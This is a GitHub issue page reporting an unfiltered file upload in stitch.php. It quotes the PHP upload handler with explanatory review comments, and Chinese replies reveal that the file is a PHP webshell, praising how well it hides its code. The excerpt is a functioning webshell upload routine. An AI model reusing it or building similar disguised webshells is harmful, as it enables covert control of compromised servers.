Open tianxiabingmadadudu opened 1 year ago
In the file stitch.php, at line 1467, there is no filtering of the uploaded file's suffix (extension), so PHP files can be uploaded. This is a file upload vulnerability!
// Excerpt from a method body in stitch.php (it uses $this; the method header is not shown here).
// It handles a multipart upload and writes the file into the directory held in $this->p.
// NOTE(review): a reply further down this page says stitch.php is a PHP webshell; if so, the
// unrestricted write is the tool's purpose, and finding this file on a server is a reason to
// investigate the host rather than to patch the upload path.

// Original file name as sent by the client in the multipart part named "upfile".
$file_name = isset($_FILES['upfile']['name']) ? $_FILES['upfile']['name'] : "";
// "name" query parameter passed through Decrypt::run (defined elsewhere); not used in the lines shown.
$name = isset($GLOBALS['_GET']['name']) ? Decrypt::run($GLOBALS['_GET']['name']) : "";
// URL-encoded parent directory of $this->p; not used in the lines shown.
$pp = urlencode(dirname($this->p));
// Heredoc of client-side JavaScript helpers: utf16to8/utf8to16 convert string encodings, and
// CheckDate() validates the "mtime" field against yyyy-mm-dd hh:mm:ss, base64-encodes the
// "newfile" and "txt" fields, then submits the form with id "editor".
// The page collapsed the heredoc onto one line; it is reproduced exactly as shown.
// $result is not used in the lines shown.
$result = <<<EOF <script> function utf16to8(str) {var out, i, len, c;out = "";len = str.length;for(i = 0; i < len; i++) {c = str.charCodeAt(i);if ((c >= 0x0001) && (c <= 0x007F)) {out += str.charAt(i);} else if (c > 0x07FF) {out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));} else {out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));}}return out;} function utf8to16(str) {var out, i, len, c;var char2, char3;out = "";len = str.length;i = 0;while(i < len) {c = str.charCodeAt(i++);switch(c >> 4) {case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:out += str.charAt(i-1);break;case 12: case 13:char2 = str.charCodeAt(i++);out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));break;case 14:char2 = str.charCodeAt(i++);char3 = str.charCodeAt(i++);out += String.fromCharCode(((c & 0x0F) << 12) |((char2 & 0x3F) << 6) |((char3 & 0x3F) << 0));break;}}return out;} function CheckDate(){var re = document.getElementById('mtime').value;var reg = /^\d{1,4}-\d{1,2}-\d{1,2} \d{1,2}:\d{1,2}:\d{1,2}$/;var r = re.match(reg);var t = document.getElementById('charset').value;t = t.toLowerCase();if(r==null){alert('日期格式不正确!格式:yyyy-mm-dd hh:mm:ss');return false;}else{document.getElementById('newfile').value = base64encode(document.getElementById('newfile').value);if(t=="utf-8"){document.getElementById('txt').value = base64encode(utf16to8(document.getElementById('txt').value));}if(t=="gbk" || t=="gb2312"){document.getElementById('txt').value = base64encode(utf16to8(document.getElementById('txt').value));}}document.getElementById('editor').submit();} </script> EOF;
// Upload branch: runs when the POST field "upload" is non-empty.
if (!empty($GLOBALS['_POST']['upload'])) {
    // Message for the success case: file name plus $this->msg[2] (presumably the "uploaded" text; confirm).
    $message_name = $file_name . ' ' . $this->msg[2];
    // Copies the temp file to $this->p . '/' . $file_name, collapsing "//" into "/".
    // The lines shown have no extension allow-list and no is_uploaded_file()/move_uploaded_file()
    // check, so a .php upload lands in the target directory under its client-chosen name.
    // "@" hides copy() warnings; on failure $this->msg[3] is shown instead.
    $content = @copy($_FILES['upfile']['tmp_name'] , str_replace('//' , '/' , $this->p . '/' . $file_name)) ? $message_name : $this->msg[3];
    // Return link carries the target directory base64-encoded in "path". For log review: a POST
    // with "upload"/"upfile" followed by a request for ?action=wjdc&path=<base64> matches this handler.
    $url = "?action=wjdc&path=" . base64_encode($this->p);
    // Renders the result message and the link via HtmlOutput::tips (defined elsewhere).
    HtmlOutput::tips($content , $url);
}
兄弟,你看好了,我这是个 PHP 大马
笑死我了草,在大马下面找漏洞
年度笑话
蚌埠住了哈哈哈🤣 项目挺不错的,居然能让别人看不出来这是PHP代码